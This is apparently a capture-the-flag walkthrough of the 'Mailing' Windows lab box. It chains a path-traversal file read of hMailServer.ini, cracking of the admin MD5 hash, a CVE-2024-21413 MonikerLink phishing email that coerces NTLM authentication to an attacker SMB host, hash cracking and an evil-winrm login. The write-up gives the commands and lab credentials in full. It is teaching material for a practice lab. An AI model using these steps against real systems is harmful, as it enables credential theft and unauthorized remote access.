Post

Mailing

A download endpoint reads arbitrary files, leaking the hMailServer admin MD5 hash; those mail credentials send a CVE-2024-21413 MonikerLink email that coerces a user's NetNTLMv2 hash, which cracks to a password for a WinRM shell and the user flag.

Mailing

Overview

Mailing is an easy Windows box running hMailServer behind an IIS site. A download.php endpoint is vulnerable to path traversal, letting us read the hMailServer.ini config and recover the mail administrator’s password from an unsalted MD5 hash. With valid mail credentials we abuse CVE-2024-21413 (the Outlook/Windows Mail “MonikerLink” bug) to phish user maya into authenticating against our SMB server, capture her NetNTLMv2 hash, crack it, and log in over WinRM for the user flag. This post covers recon through the user flag.

Machine Matrix

Enumeration Real-Life CVE Custom Exploitation CTF-like

Path-traversal config leak feeds a named CVE-2024-21413 MonikerLink NTLM-coercion phish; realistic mail-server chain where the public CVE is the central foothold mechanism.

Recon

1
nmap -p- --min-rate=1000 -sV 10.10.11.14
PortServiceNotes
25/tcpSMTPhMailServer smtpd
80/tcpHTTPMicrosoft IIS httpd 10.0
110/tcpPOP3hMailServer pop3d
143/tcpIMAPhMailServer imapd
445/tcpSMBmicrosoft-ds
465/587/993SMTPS/submission/IMAPShMailServer
135, 139, 5985, 47001, 49664+RPC / WinRMWindows

The version banners make the theme obvious: this host is a mail server (hMailServer) with a web front end on IIS. Browsing port 80 redirects to mailing.htb, so add it to /etc/hosts:

1
echo "10.10.11.14  mailing.htb" | sudo tee -a /etc/hosts

The site advertises “Mailing - The ultimate mail server”, lists three team members (Ruy Alonso, Maya Bendito of the Support Team, Gregory Smith), and offers a Download Instructions button.

Enumeration

The instructions button issues a request to:

1
GET /download.php?file=instructions.pdf

The application reads the file parameter and returns the corresponding file from disk. If that value isn’t sanitized, ..\..\ sequences let us climb out of the intended directory — classic path traversal. Confirm it by reading a file that always exists on Windows:

1
curl -s "http://mailing.htb/download.php?file=../../Windows/System32/drivers/etc/hosts"

The response is the Windows HOSTS file, including the mailing.htb line — traversal confirmed.

Foothold

1 — Read the hMailServer config. hMailServer keeps its settings (including the admin password) in a config file at a well-known location: C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini. Pull it through the same traversal primitive (spaces URL-encoded):

1
curl -s "http://mailing.htb/download.php?file=../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini"

The [Security] section reveals the administrator password as an MD5 hash:

1
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7

2 — Crack the hash. It’s an unsalted MD5, so it resolves instantly against a public lookup (CrackStation) or hashcat mode 0:

1
hashcat -a 0 -m 0 hash.txt /usr/share/wordlists/rockyou.txt

The plaintext is homenetworkingadministrator, giving us [email protected] mail credentials.

3 — Phish maya with CVE-2024-21413. Since the host runs Windows Mail, we abuse the MonikerLink bug: an email body containing a \\<attacker_ip>\share\file link causes the recipient’s mail client to silently authenticate to our SMB server over NTLM. Clone the PoC and start a capture server:

1
2
git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability.git
sudo impacket-smbserver smbFolder "$(pwd)" -smb2support

Send the malicious email from the admin account to maya (the Support Team member is a plausible reader):

1
2
3
4
python3 CVE-2024-21413.py --server mailing.htb --port 587 \
  --username [email protected] --password 'homenetworkingadministrator' \
  --sender [email protected] --recipient [email protected] \
  --url "\\10.10.14.14\smbFolder\test.txt" --subject Test

Shortly after, the SMB server logs an incoming connection and prints maya’s NetNTLMv2 hash:

1
2
[*] AUTHENTICATE_MESSAGE (MAILING\maya,MAILING)
maya::MAILING:aaaaaaaaaaaaaaaa:60f6b238b0a3e2756d6d1e3599...

4 — Crack and log in. Save the hash and crack it with John:

1
john -w=/usr/share/wordlists/rockyou.txt hash.txt

It cracks to m4y4ngs4ri. Those credentials work over WinRM:

1
evil-winrm -u maya -p m4y4ngs4ri -i mailing.htb

User flag

1
type C:\Users\maya\Desktop\user.txt
1
[redacted]

Shell as mailing\maya and the user flag are ours.

Privilege escalation (LibreOffice CVE-2023-2255) is left as an exercise — this post stops at user.

This post is licensed under CC BY 4.0 by the author.